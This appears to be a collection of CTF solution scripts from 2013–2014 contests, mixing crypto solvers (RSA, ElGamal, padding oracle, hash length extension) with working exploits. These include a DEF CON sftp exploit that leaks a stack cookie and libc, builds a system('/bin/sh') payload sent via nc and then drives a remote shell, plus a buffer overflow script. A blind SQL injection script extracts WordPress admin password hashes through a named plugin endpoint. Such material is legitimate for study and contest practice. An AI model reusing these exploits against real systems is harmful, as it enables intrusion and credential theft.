49 | 		puts "get_first_byte : #{@key}"
50 | 	end
51 | 
52 | 	def get_next_byte
53 | 			100.times do |cnt|
54 | 					dummy = "+" * cnt
55 | 					c = {}
56 | 					@charset.each do |x|
57 | 							c[x] = get_length((@key+x) * cnt)
58 | 					end
59 | 
60 | 					next_byte = get_bytes(c)
61 | 					puts "get_next_byte : #{next_byte}"
62 | 					puts "Success : #{next_byte}" if next_byte.length == 1
63 | 			end
64 | 	end
65 | end
66 | 
67 | s = CompExploit.new
68 | s.get_nonce
69 | s.get_next_byte
70 | 


--------------------------------------------------------------------------------
/2013/pctf/giga/decrypt.py:
--------------------------------------------------------------------------------
 1 | p = 13024503624536986372207718799887559302163373521704796859169256921158088157401633181315388323654235925097662427617011693572649107613454204598163366409190531
 2 | n = 157051302474457581293036787330969331464775850878891372978838539416588868233426014492406511583009093201777959474514878639536445804860657263671920872630373659846692222779553914817585275449790773059139654719259450373042492940681312609384145831176362131114203919180569933962838166419660656321919540477301488654477L
 3 | enc = 0x630f33b0a96b93ca75d1ffface41c849fa10f0411ff34406f7702cbd9de81f46fbb0a29fb02c63f0ec970eab298958648bac20bd69b4dd16ccc0c5e2e3af365b619eb1b41fe72d2dd7eb3da0eba226519aef0161e575d306006a52b010a488c78b374653ebee3c891e36cbf8f8ca2a380419256d622185ffdc917ab4aa40f982
 4 | 
 5 | q = n / p
 6 | pi = (p - 1)*(q - 1)
 7 | 
 8 | 
 9 | def egcd(a, b):
10 | 	if a == 0:
11 | 		return (b, 0, 1)
12 | 	else:
13 | 		g, y, x = egcd(b % a, a)
14 | 		return (g, x - (b//a)*y, y)
15 | 
16 | def modinv(a, m):
17 | 	g, x, y = egcd(a, m)
18 | 	if g != 1:
19 | 		return None
20 | 	else:
21 | 		return x % m
22 | 
23 | def int2bytes(x):
24 | 	output = ""
25 | 	while x != 0:
26 | 		output += chr(x%0x100)
27 | 		x >>= 8
28 | 	return output
29 | 
30 | d = modinv(65537, pi)
31 | print int2bytes(pow(enc, d, n))[::-1]
32 | 
33 | 


--------------------------------------------------------------------------------
/2013/pctf/giga/entropy.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | from Crypto.PublicKey import RSA
 4 | from Crypto.Hash import MD5
 5 | import SocketServer
 6 | import threading
 7 | import time
 8 | 
 9 | rbuf = os.urandom(4096)
10 | hr = MD5.new()
11 | 
12 | def rng(n):
13 |   global rbuf
14 |   rand = rbuf[:n]
15 |   rbuf = rbuf[n:]
16 |   while (len(rbuf) < 4096):
17 |     hr.update(os.urandom(4096))
18 |     rbuf += rbuf + hr.hexdigest()
19 |   return rand
20 | 
21 | collections = []
22 | 
23 | for x in xrange(100000):
24 | 	rsa = RSA.generate(1024,rng)
25 | 	p = getattr(rsa, 'p')
26 | 	q = getattr(rsa, 'q')
27 | 
28 | 	if p in collections or q in collections:
29 | 		print "FAIIIIIIIIIIIIL"
30 | 		sys.exit()
31 | 	
32 | 	collections.append(p)
33 | 	collections.append(q)
34 | 
35 | 	if x % 1000 == 0:
36 | 		print "%d times" % x
37 | 
38 | 


--------------------------------------------------------------------------------
/2013/pctf/giga/exploit.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from Crypto.PublicKey import RSA
 3 | from Crypto.Hash import MD5
 4 | from socket import *
 5 | from fractions import gcd
 6 | import sys
 7 | 
 8 | def get_n(rsa_a, rsa_b):
 9 | 	val_a = 2**65537 - int(rsa_a, 16)
10 | 	val_b = 3**65537 - int(rsa_b, 16)
11 | 	return gcd(val_a, val_b)
12 | 
13 | def check(l):
14 | 	for x in l:
15 | 		for y in l:
16 | 			if x == y:
17 | 				continue
18 | 
19 | 			p = gcd(x["n"], y["n"])
20 | 			if len(bin(p)) > 100:
21 | 				print "FOUND p : " + str(p)
22 | 				print "x : " + str(x)
23 | 				sys.exit(1)
24 | 
25 | n_list = []
26 | 
27 | while True:
28 | 		s = socket(AF_INET, SOCK_STREAM)
29 | 		s.connect(('localhost', 4321))
30 | 		f = s.makefile()
31 | 		times = 0
32 | 		while times < 5:
33 | 			d = f.readline()
34 | 			#print d
35 | 			if d.find('===========================') >= 0:
36 | 				if times == 0:
37 | 					value = f.readline()
38 | 					#print "value : " + value
39 | 				elif times == 1:
40 | 					s.send("\x00"*1023 + "\x02")
41 | 				elif times == 2:
42 | 					rsa_a = f.readline()
43 | 					#print "rsa_a : " + rsa_a
44 | 				elif times == 3:
45 | 					s.send("\x00"*1023 + "\x03")
46 | 				elif times == 4:
47 | 					rsa_b = f.readline()
48 | 					#print "rsa_b : " + rsa_b
49 | 					break
50 | 				times += 1
51 | 
52 | 		s.close()
53 | 		x = {"n":get_n(rsa_a, rsa_b), "enc":value}
54 | 		n_list.append(x)
55 | 		check(n_list)
56 | 		print "%d times" % len(n_list)
57 | 
58 | 
59 | 
60 | 


--------------------------------------------------------------------------------
/2013/pico/cbc_server/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | 
 3 | class Exploit
 4 |   def initialize
 5 |     @s = TCPSocket.new('localhost', 4567)
 6 |     p @s.readline
 7 |     p @s.readline
 8 |   end
 9 | 
10 |   def query(msg)
11 |     @s.write(msg + "\n")
12 |     res = @s.readline
13 |     return !res.index("padding")
14 |   end
15 | 
16 |   def sxor(s1, s2)
17 |     s1.bytes.zip(s2.bytes).map{|v| (v[0] ^ v[1]).chr}.join
18 |   end
19 | 
20 |   def brute
21 |     orig = "a" * 32 # initial value
22 |     plain = "\x00" * 16
23 | 
24 |     16.times do |i|
25 |       index = 15 - i  # find value from backward
26 |       p index
27 |       padding_byte = i + 1
28 | 
29 |       msg = sxor(orig[0..15], plain)
30 |       padding = (padding_byte.chr * i).rjust(16, "\x00")
31 |       msg = sxor(msg, padding) + orig[16..-1]
32 | 
33 |       puts "Padding : #{padding.inspect}"
34 |       puts "MSG : #{msg.inspect}"
35 | 
36 |       256.times do |g|
37 |         msg[index] = (orig[index].ord ^ g ^ padding_byte).chr
38 |         if query(msg)
39 |           plain[index] = g.chr
40 | 
41 |           puts "FOUND : %dth value = %d" % [i, g]
42 |           puts "Plain : #{plain.inspect}"
43 |           break
44 |         end
45 |       end
46 |     end
47 | 
48 |     msg = sxor(orig[0..15], sxor(plain, "flag".ljust(16, "\x0c"))) + orig[16..-1]
49 |     puts "FINAL : #{msg.inspect}"
50 |     @s.write(msg + "\n")
51 |     loop { print @s.read(0x1) }
52 | 
53 |   end
54 | end
55 | 
56 | s = Exploit.new
57 | s.brute
58 | 


--------------------------------------------------------------------------------
/2013/secuinside/movie_talk/exploit.py:
--------------------------------------------------------------------------------
 1 | import subprocess
 2 | import time
 3 | import signal, sys
 4 | import struct
 5 | 
 6 | fd = subprocess.Popen("./movie_talk", stdin=subprocess.PIPE)
 7 | #fd = subprocess.Popen("/bin/ls", stdin=subprocess.PIPE)
 8 | print "PID : " + str(fd.pid)
 9 | stdin = fd.stdin
10 | #stdout = fd.stdout
11 | execv = struct.pack('<I', 0x400e40f0)
12 | #execv = struct.pack('<I', 0x4006b280)
13 | execv = struct.pack('<I', 0x400e4290)
14 | stdin.write("1\n")
15 | stdin.write(execv + "bbbbccccdddd\n")
16 | stdin.write("1\n")
17 | stdin.write("0\n")
18 | 
19 | time.sleep(4);
20 | 
21 | stdin.write("3\n");
22 | 
23 | time.sleep(4);
24 | 
25 | stdin.write("1\n")
26 | stdin.write(execv + "cbbbccccdddd\n")
27 | stdin.write("1\n")
28 | stdin.write("0\n")
29 | 
30 | time.sleep(4)
31 | 
32 | stdin.write("3\n")
33 | 
34 | time.sleep(4)
35 | 
36 | fd.send_signal(3)
37 | stdin.write("1\n")
38 | time.sleep(1)
39 | fd.send_signal(20)
40 | 
41 | stdin.write(execv + "dbbbccccdddd\n")
42 | stdin.write("1\n")
43 | stdin.write("0\n")
44 | 
45 | stdin.write(execv + "ebbbccccdddd\n")
46 | stdin.write("1\n")
47 | stdin.write("0\n")
48 | 
49 | time.sleep(5)
50 | 
51 | stdin.write("3\n")
52 | 
53 | time.sleep(5)
54 | 
55 | #fd.kill()
56 | raw_input()
57 | 


--------------------------------------------------------------------------------
/2014/asis/crsh/prev_prime.py:
--------------------------------------------------------------------------------
 1 | from gmpy import next_prime
 2 | from random import randint
 3 | 
 4 | def find_low(p):
 5 |     low = p // 2
 6 |     while(next_prime(low) == p):
 7 |         low //= 2
 8 |     return low
 9 | 
10 | def prev_prime(p):
11 |     lo = find_low(p)
12 |     pp = next_prime(lo)
13 |     hi = p
14 | 
15 |     while lo < hi:
16 |         mid = (lo + hi) // 2
17 |         print mid
18 |         mid_p = next_prime(mid)
19 |         if(mid_p == p):
20 |             hi = mid
21 |         else:
22 |             pp = mid_p
23 |             lo = mid + 1
24 | 
25 |     return pp
26 | 
27 | print prev_prime(71445390607919938548377475361074566973666877698962004381686815881759650363064790907205389724727052137547259275540047248324480810969042982358139755944485006293081693292128510719329497724780095449564775706193685016091515868306878669276650004788889866268563082218902602391430478108176895385536441463628368479691L)
28 | 


--------------------------------------------------------------------------------
/2014/asis/crsh/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'pwnbox'
 2 | include Pwnbox
 3 | 
 4 | q = 136251271151175798114432982938026229490172110401533005102755262286989049184622583417708312009201423476024122677912469680055108982880741528463299142672020834652185527641834721206398483386320729427665613285937265257500825945169037119499345376317962489316486718729170177878788547880596679146803674652102959291179
 5 | z = 71445390607919938548377475361074566973666877698962004381686815881759650363064790907205389724727052137547259275540047248324480810969042982358139755944485006293081693292128510719329497724780095449564775706193685016091515868306878669276650004788889866268563082218902602391430478108176895385536441463628368479551
 6 | g = 71445390607919938548377475361074566973666877698962004381686815881759650363064790907205389724727052137547259275540047248324480810969042982358139755944485006293081693292128510719329497724780095449564775706193685016091515868306878669276650004788889866268563082218902602391430478108176895385536441463628368479691
 7 | c = [95467029105787819790685969501366652001448206091850219200437950980373198908537653149971642327326341562268633482168133967260392708002179128551446621791484500920123876866983047200450805908685344827646021342534877486305386714673539389693570659549538563696044252832011728553065377412813197782577269476428499901380,57101456812661040956911779152454680172788225654576055105325326802166273530593058160592967123782888106635604456486570389449265108078292983788415457231056869140594423238818468521681863517528522462778250100010993034244098761920700791617733626499616701097597271369053126885898596529980095548583743153472666478505]
 8 | 
 9 | priv_key = ElGamal::PrivKey.new(q, g, z)
10 | m = priv_key.decrypt(c)
11 | puts Number::to_s(m)
12 | 


--------------------------------------------------------------------------------
/2014/asis/random_image/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from PIL import Image
 4 | import random
 5 | 
 6 | def get_color(x, y, r):
 7 |   n = (pow(x, 3) + pow(y, 3)) ^ r
 8 |   return (n ^ ((n >> 8) << 8 ))
 9 | 
10 | flag_img = Image.open('enc.png.orig')
11 | im = flag_img.load()
12 | r = random.randint(1, pow(2, 256))
13 | print flag_img.size
14 | 
15 | enc_img = Image.new(flag_img.mode, flag_img.size)
16 | enpix = enc_img.load()
17 | 
18 | for x in range(flag_img.size[0]):
19 |   for y in range(flag_img.size[1]):
20 |     enpix[x,y] = 0
21 | 
22 | for x in range(flag_img.size[0]):
23 |   for y in range(flag_img.size[1]):
24 |     enpix[x, y] = im[x,y] ^ get_color(x, y, 0)
25 | 
26 | enc_img.save('enc' + '.png')
27 | 
28 | 
29 | 


--------------------------------------------------------------------------------
/2014/bkp-ctf/hashme/extension.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | from math import sin
 3 | 
 4 | def hashme(s, length):
 5 |   #my secure hash function
 6 |   def F(X,Y,Z):
 7 |     return ((~X & Z) | (~X & Z)) & 0xFFFFFFFF
 8 |   def G(X,Y,Z):
 9 |     return ((X & Z) | (~Z & Y)) & 0xFFFFFFFF
10 |   def H(X,Y,Z):
11 |     return (X ^ Y ^ Y) & 0xFFFFFFFF
12 |   def I(X,Y,Z):
13 |     return (Y ^ (~Z | X)) & 0xFFFFFFFF
14 |   def ROL(X,Y):
15 |     return (X << Y | X >> (32 - Y)) & 0xFFFFFFFF
16 | 
17 |   A = 0x09ee2fba
18 |   B = 0xf9e1dfcc
19 |   C = 0x2e69f59e
20 |   D = 0xd1d1371e
21 |   X = [int(0xFFFFFFFF * sin(i)) & 0xFFFFFFFF for i in xrange(256)]
22 |   
23 |   for i,ch in enumerate(s):
24 |     k, l = ord(ch), (i + length) & 0x1f
25 |     A = (B + ROL(A + F(B,C,D) + X[k], l)) & 0xFFFFFFFF
26 |     B = (C + ROL(B + G(C,D,A) + X[k], l)) & 0xFFFFFFFF
27 |     C = (D + ROL(C + H(D,A,B) + X[k], l)) & 0xFFFFFFFF
28 |     D = (A + ROL(D + I(A,B,C) + X[k], l)) & 0xFFFFFFFF
29 | 
30 |   return ''.join(map(lambda x : hex(x)[2:].strip('L').rjust(8, '0'), [B, A, D, C]))
31 | 
32 | if __name__ == '__main__':
33 | #  print hashme("", int(sys.argv[1]))
34 |   print hashme("&role=administrator", int(sys.argv[1]))
35 | 


--------------------------------------------------------------------------------
/2014/bkp-ctf/hashme/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | require 'base64'
 3 | 
 4 | class Exploit
 5 |   def initialize
 6 |     @s = TCPSocket.new('0.0.0.0', 7777)
 7 |   end
 8 | 
 9 |   def get_menu
10 |     4.times { puts @s.readline }
11 |   end
12 | 
13 |   def register(id)
14 |     get_menu
15 |     @s.puts("0")
16 |     puts @s.read(12)
17 |     @s.puts(id)
18 |     2.times { puts @s.readline }
19 |     return @s.readline
20 |   end
21 | 
22 |   def extract_key (num)
23 |     id = "a" * num
24 |     cert = Base64.decode64(register(id))
25 |     @key = sxor(cert, "login=#{id}")
26 |   end
27 | 
28 |   def extract_hash
29 |     cert = register("id")
30 |     p cert
31 |     cert = Base64.decode64(cert)
32 |     plain = sxor(@key, cert)
33 |     @head = plain[0..22]
34 |     @hash = plain[23..-1]
35 | 
36 |   end
37 | 
38 |   def sxor(s1, s2)
39 |     s1, s2 = s2, s1 if s1.length > s2.length
40 |     s1.each_byte.zip(s2.each_byte).map{|x, y| (x^y).chr }.join
41 |   end
42 | 
43 |   def brute
44 |     0x1f.times do |i|
45 |       get_menu
46 |       @s.puts("1")
47 |       puts @s.readline
48 |       cert = @head + "&role=administrator"
49 |       cert += `python extension.py #{i}`.strip
50 |       cert = sxor(cert, @key)
51 |       cert = Base64.strict_encode64(cert)
52 |       p cert
53 |       @s.puts(cert)
54 |       if @s.readline.index("Welcome")
55 |           puts "----------------------------------------------------"
56 |           puts @s.readline
57 |           puts "----------------------------------------------------"
58 |       end
59 |     end
60 |   end
61 | end
62 | 
63 | s = Exploit.new
64 | s.extract_key(1024)
65 | s.extract_hash
66 | s.brute
67 | 


--------------------------------------------------------------------------------
/2014/codegate-final/wsh/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | 
 3 | s = TCPSocket.new('0.0.0.0', 30000)
 4 | target = [0x00000000006028E0].pack("Q")
 5 | s.write('a'*520+target+"d"*8+"\x00"*8+"\n\n")
 6 | loop do
 7 |         begin
 8 |                 puts s.readline()
 9 |         rescue
10 |                 s.close()
11 |                 break
12 |         end
13 | end
14 | 


--------------------------------------------------------------------------------
/2014/codegate/clone/solve.py:
--------------------------------------------------------------------------------
 1 | def rol(s, x):
 2 |   return (s << x | s >> (32 - x)) & 0xffffffff
 3 | 
 4 | def decrypt(s, a, b):
 5 |   result = ""
 6 |   for i in range(0, len(s), 2):
 7 |     result += chr( (a ^ ord(s[i])) & 0xff)
 8 |     a = rol(a, 5) ^ 0x2f;
 9 |     result += chr( (b ^ ord(s[i+1])) & 0xff)
10 |     b = (a & 0xff) ^ rol(b, 11)
11 | 
12 |   return result
13 | 
14 | s = "\x0F\x8E\x9E\x39\x3D\x5E\x3F\xA8\x7A\x68\x0C\x3D\x8B\xAD\xC5\xD0\x7B\x09\x34\xB6\xA3\xA0\x3E\x67\x5D\xD6"
15 | 
16 | logs = open('logs').readlines()[1:]
17 | 
18 | for log in logs:
19 |   log = log.rstrip()
20 |   arg = log.split(" ")[-3: -1]
21 |   print decrypt(s, int(arg[0]), int(arg[1]))
22 | 


--------------------------------------------------------------------------------
/2014/defcon/sftp/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | 
 3 | def itos(i)
 4 |         result = ""
 5 |         4.times do |x|
 6 |                 result += "\\x%02X"% (i & 0xff)
 7 |                 i >>= 8
 8 |         end
 9 |         return result
10 | end
11 | 
12 | #print itos(0x12345678)
13 | 
14 | #host = 'localhost'
15 | #port = 11115
16 | host = 'sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me'
17 | port = 115
18 | s = TCPSocket.new(host, port)
19 | s.puts("PASS defcon2014")
20 | puts s.readline
21 | s.puts("RETR ./freetime")
22 | p s.read(1)
23 | puts "[*] First chance"
24 | STDIN.readline()
25 | s.puts("SEND")
26 | x = s.read(0x62e)
27 | ret = x.index("\xf8\x9b\x04\x08")
28 | stack_cookie =  x[ret-16..ret-13].unpack('<I')[0]
29 | #libc_base = x[1368..1368+3].unpack('<I')[0] - 0x000193E9
30 | #system = libc_base + 0x0003F430
31 | #bin_sh = libc_base + 0x161D98
32 | libc_base = x[1368..1368+3].unpack('<I')[0] - 0x19999
33 | system = libc_base + 0x403B0
34 | bin_sh = libc_base + 0x1615A4
35 | puts "[*] stack cookie : %08X" % stack_cookie
36 | puts "[*] system : %08X" % system
37 | puts "[*] /bin/sh : %08X" % bin_sh
38 | 
39 | puts "(python -c'print\"PASS defcon2014\\nKILL ./freetime\\nSTOR APP ./freetime\\nSIZE 0\\nLIST V ./\\n\"';cat;python -c'print\"STOR APP ./freetime\\nSIZE 941\\n\"+\"a\"*44+\"\\x37\"+\"A\"*868+\"%s\"+\"x\"*12+\"%sCCCC%s\"+\"LIST V ./\"')|nc %s %d" % [itos(stack_cookie), itos(system), itos(bin_sh), host, port]
40 | 
41 | puts "[*] Delete file"
42 | STDIN.readline()
43 | s.puts ("RETR ./freetime")
44 | p s.read(1)
45 | puts "[*] Change file"
46 | STDIN.readline()
47 | s.puts("SEND")
48 | 
49 | 
50 | # when get shell
51 | Thread.new do |t|
52 |         loop do
53 |                 print s.read(1)
54 |         end
55 | end
56 | 
57 | loop do
58 |         s.puts(STDIN.readline())
59 | end
60 | 


--------------------------------------------------------------------------------
/2014/defcon/sftp/solve.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2014/defcon/sftp/solve.txt


--------------------------------------------------------------------------------
/2014/defcon/turdedo/solve.txt:
--------------------------------------------------------------------------------
 1 | libc_start_main : 00019990
 2 | libc : f7592990
 3 | 
 4 | fsb : /bin/sh addr
 5 | sendto : system
 6 | 
 7 | bss = 0x0804F180
 8 | fd = 0x0804E15C
 9 | send_to_got = 0x804E0A8
10 | 
11 | 
12 | __libc_start_main : 00019990 
13 | snprintf : 0004D4E0 
14 | 
15 | 
16 | Connection from 54.255.187.190 port 8080 [tcp/http-alt] accepted
17 | The flag is: Why isn't everyone native IPv6 by now?!?!
18 | 


--------------------------------------------------------------------------------
/2014/defkthon/crypto400/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'pwnbox'
 2 | include Pwnbox
 3 | 
 4 | fp = 132494088931324173283059089325333124063414930468133702126988638201566840080279688692270260976244075796759452769107703889701056461716986642047396562461784657371252230600154091356484125143492926885766560947038350744162283453088412033743007996092246066977331914287954081085286882863087208778200599864036808842423
 5 | 
 6 | c = 5675984633221796099305779023406421236073672005146711961486737919555738100978446093305079418478991995403746022816916412356994878653628335811932893115437394563757027876642990871681753844775183013343780661130997286437979938580831485660799087563922962824571317922100215767717140947678897257602163481431020989395
 7 | 
 8 | c1 = 95814474484856787532476404827109080772813096847565766872670223089513058324018054256473407532228429567920650893101783621048719011811995946563450496362013959150910622710392266362585423051334198271395317146379007318264890750202744793397530741775058934235135099760843777678197602079507436273739035154719878663755
 9 | 
10 | p1 = 2417030949439095749819312326857869812684657585441453372477474342325106120096235844085571568343870058164066
11 | c2 = 21852694229169712646029298600167789480977201201406804205926970514783821631671373033538149483328747906575670885693126809030111162698272434440067125792759941323658928483332458204323220891917959141003050184469763678962831475165564909518131703687748904353425643251224868272668580206911922475172720604815626110911
12 | 
13 | secret = (c2 * Number.mod_inverse(p1, fp)) % fp
14 | 
15 | flag = 47903875315431839052590785234829178633539527470664479545308173438768813012739281005907286495410794463365100741926360747280367322908534765243882499838483700898335845448049914306934755539052461623122703904283994191684759918490325193082760484719058033639682752662701488235765958557674743271239664855997353959120
16 | 
17 | flag = (flag * Number.mod_inverse(secret, fp)) % fp
18 | puts Number.i_to_s(flag)
19 | 


--------------------------------------------------------------------------------
/2014/hdcon/web/exploit.rb:
--------------------------------------------------------------------------------
 1 | #substr(LPAD(bin(ascii(substr(target, #{i}, 1))),8,0), #{j}, 1) = 0x31
 2 | 
 3 | require 'rubygems'
 4 | require 'mechanize'
 5 | 
 6 | database = '0x7072656368616C6C'
 7 | table = "0x" + ("$P$BeWNozh1nxAkcILXemEorouBJ0OQbd1".each_byte.map{|x| "%02X" % x}).join
 8 | login = "0x" + ("admin".each_byte.map{|x| "%02X" % x}).join
 9 | browser = Mechanize.new
10 | result = ""
11 | offset = ARGV[0].to_i
12 | 100.times do |i|
13 | puts "#{i}th char"
14 | bin_text = ""
15 | 8.times do |j|
16 | puts "#{j} position"
17 | #post_id = "IF(substr(LPAD(bin(ascii(substr(database(), #{i + 1}, 1))), 8,0), #{j + 1}, 1) = 0x31, 18, 200)"
18 | post_id = "IF(substr(LPAD(bin(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=#{database}), #{i + 1 + offset}, 1))), 8,0), #{j + 1}, 1) = 0x31, 18, 200)"
19 | post_id = "IF(substr(LPAD(bin(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=#{table}), #{i + 1}, 1))), 8,0), #{j + 1}, 1) = 0x31, 18, 200)"
20 | #post_id = "IF(substr(LPAD(bin(ascii(substr((select group_concat(user_login) from wp_users), #{i + 1}, 1))), 8,0), #{j + 1}, 1) = 0x31, 18, 200)"
21 | post_id = "IF(substr(LPAD(bin(ascii(substr((select group_concat(user_pass) from wp_users where user_login=#{login}), #{i + 1+offset}, 1))), 8,0), #{j + 1}, 1) = 0x31, 18, 200)"
22 | body = {"post_id"=> post_id, "up_type"=> "like"}
23 | page = browser.post('http://14.0.84.130:8080/prechall/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php', body)
24 | if page.body.to_i(10) > 1
25 | bin_text += '1'
26 | else
27 | bin_text += '0'
28 | end
29 | p bin_text
30 | end
31 | result += bin_text.to_i(2).chr
32 | puts "FOUND : #{result}"
33 | end
34 | 


--------------------------------------------------------------------------------
/2014/hitcon/finger/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | require 'digest'
 3 | class Exploit
 4 | 	def initialize
 5 | 		@s = TCPSocket.new('210.71.253.236',7171)
 6 | 	end
 7 | 
 8 | 	def exploit
 9 | 		3.times { puts @s.readline }
10 | 		@hands = @s.readline.gsub('"', '').gsub(" ", "")[7..-3].split(",")
11 | 		puts @s.readline
12 | 		puts @s.read("how many? ".length)
13 | 		@s.puts("1")
14 | 		puts @s.read("the magic? ".length)
15 | 		mine = @hands[0].ljust(16, "A")
16 | 		@s.puts Digest::MD5.hexdigest(mine).to_i(16)
17 | 
18 | 		5.times { print @s.read(1) }
19 | 		puts
20 | 		yours = @s.readline[14..-2]
21 | 		index = @hands.index(yours)	
22 | 		print @s.read("show me the secret: ".length)
23 | 
24 | 		if index == 0 or index == 2
25 | 			@s.puts mine
26 | 		else
27 | 			@s.puts "a" # i will cheat :)
28 | 		end
29 | 
30 | 		puts @s.readline
31 | 	end
32 | end
33 | s = Exploit.new
34 | loop do
35 | 	s.exploit
36 | end
37 | 


--------------------------------------------------------------------------------
/2014/hitcon/py4h4sher/stage1.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <stdint.h>
  4 | #include <unordered_map>
  5 | 
  6 | using namespace std;
  7 | 
  8 | char dict[] = {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'};
  9 | 
 10 | unordered_map<uint64_t, uint32_t> table;
 11 | 
 12 | int fill_buffer(uint8_t* buf, uint32_t index, int size)
 13 | {
 14 | 	int i;
 15 | 	char ch;
 16 | 	for (i = 0; i < size; i++)
 17 | 	{
 18 | 		ch = dict[index % 24];
 19 | 		index = index / 24;
 20 | 		buf[2*i] = ch;
 21 | 		buf[2*i + 1] = 'a'+'z' - ch;
 22 | 	}
 23 | }
 24 | 
 25 | static int
 26 | oldpw_rev(uint32_t *pnr, uint32_t *pnr2, uint32_t add,
 27 |         unsigned char *cc, unsigned len)
 28 | {
 29 |         uint32_t nr, nr2;
 30 |         uint32_t c, u, e, y;
 31 | 
 32 |         if (len == 0) {
 33 |                 return 0;
 34 |         }
 35 | 
 36 |         nr = *pnr;
 37 |         nr2 = *pnr2;
 38 |         c = cc[len - 1];
 39 |         add -= c;
 40 | 
 41 |         u = nr2 - nr;
 42 |         u = nr2 - ((u << 8) ^ nr);
 43 |         u = nr2 - ((u << 8) ^ nr);
 44 |         nr2 = nr2 - ((u << 8) ^ nr);
 45 |         nr2 &= 0x7FFFFFFF;
 46 | 
 47 |         y = nr;
 48 |         for (e = 0; e < 64; e ++) {
 49 |                 uint32_t z, g;
 50 | 
 51 |                 z = (e + add) * c;
 52 |                 g = (e ^ z) & 0x3F;
 53 |                 if (g == (y & 0x3F)) {
 54 |                         uint32_t x;
 55 | 
 56 |                         x = e;
 57 |                         x = y ^ (z + (x << 8));
 58 | 
 59 |                         x = y ^ (z + (x << 8));
 60 |                         x = y ^ (z + (x << 8));
 61 |                         nr = y ^ (z + (x << 8));
 62 |                         nr &= 0x7FFFFFFF;
 63 |                         if (oldpw_rev(&nr, &nr2, add, cc, len - 1) == 0) {
 64 |                                 *pnr = nr;
 65 |                                 *pnr2 = nr2;
 66 |                                 return 0;
 67 |                         }
 68 |                 }
 69 |         }
 70 | 
 71 |         return -1;
 72 | }
 73 | 
 74 | int oldpw(uint8_t *cc, uint32_t len, uint32_t *pnr, uint32_t *pnr2)
 75 | {
 76 | 	uint32_t nr = 1345345333, nr2 = 305419889;
 77 | 	uint32_t add = 7, i;
 78 | 
 79 | 	for(i = 0; i < len; i++)
 80 | 	{
 81 | 		char c = cc[i];
 82 | //		printf("%x %x\n", nr, nr2);
 83 | 		nr ^= (((nr & 0x3f)+add)*c)+ (nr << 8) & 0xFFFFFFFF;
 84 | 		nr2= (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF;
 85 | 		add= (add + c) & 0xFFFFFFFF;
 86 | 	}
 87 | 	*pnr = nr & 0x7fffffff;
 88 | 	*pnr2 = nr2 & 0x7fffffff;
 89 | //	printf("%d\n", add);
 90 | }
 91 | 
 92 | void make_table()
 93 | {
 94 | 	int i;
 95 | 	uint8_t buf[12];
 96 | 	uint32_t nr, nr2;
 97 | 	for (i = 0; i < 0x1000000; i++)
 98 | //	for (i = 0; i < 0x1; i++)
 99 | 	{
100 | 		fill_buffer(buf,i, 6);
101 | 		oldpw(buf, 12, &nr, &nr2);
102 | 		table[((uint64_t)nr << 32)|nr2] = i;
103 | 	}
104 | 	printf("[*] Make table ended\n");
105 | }
106 | 
107 | int main()
108 | {
109 | 	uint64_t i;
110 | 	uint8_t buf[16];
111 | 	uint32_t nr, nr2;
112 | 	uint64_t key;
113 | 
114 | 	make_table();
115 | 	for (i = 0 ; i < 0x10000000000; i++)
116 | 	{
117 | 		nr	= 0x41414141;
118 | 		nr2 = 0x41414141;
119 | 		fill_buffer(buf, i, 8);
120 | 		oldpw_rev(&nr, &nr2, 3073, buf, 16);
121 | 		key = ((uint64_t)nr << 32)|nr2;
122 | 		if (table.find(key) != table.end())
123 | 		{
124 | 			printf("[*] YES! FOUND\n");
125 | 			printf("index1 : %lld, index2 : %lld\n", table[key], i);
126 | 			exit(-1);
127 | 		}
128 | 	}
129 | }
130 | 


--------------------------------------------------------------------------------
/2014/hitcon/rsaha/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'rubygems'
 2 | require 'rsa'
 3 | require 'socket'
 4 | 
 5 | class Exploit
 6 | 	def initialize
 7 | 		@s = TCPSocket.new('54.64.40.172', 5454)
 8 | 	end
 9 | 
10 | 	def solve
11 | 		n = @s.readline.to_i
12 | 		m = @s.readline.to_i
13 | 		m_1 = @s.readline.to_i
14 | 
15 | #		n = 7 * 13
16 | #		m = 3**3 % n
17 | #		m_1 = 4**3 % n
18 | 
19 | 		i_3 = RSA::Math.modinv(3, n)
20 | 		i_m = RSA::Math.modinv(m - 1, n)
21 | 		
22 | 		t = (m_1 - m - 1) % n 
23 | 		t = (t * i_3) % n
24 | 
25 | 		answer = ((RSA::Math.modpow(t, 2, n) - t - 2 * m) * i_m) % n
26 | 		puts "Answer : %d" % answer
27 | 		@s.puts answer.to_s
28 | 		p @s.readline
29 | 	end
30 | end
31 | 
32 | =begin
33 | s = Exploit.new
34 | 11.times { s.solve }
35 | =end
36 | #Answer : 163554855920981642930553741163947442415491794235989756192875957861936245924759969344760971902949404770611500364708576710130676421835246926417066147023063612453790587329340191599745998993678119062546130850824658843219825102964690853699118700706889706567750458848891052298
37 | 
38 | answer = 163554855920981642930553741163947442415491794235989756192875957861936245924759969344760971902949404770611500364708576710130676421835246926417066147023063612453790587329340191599745998993678119062546130850824658843219825102964690853699118700706889706567750458848891052298
39 | 
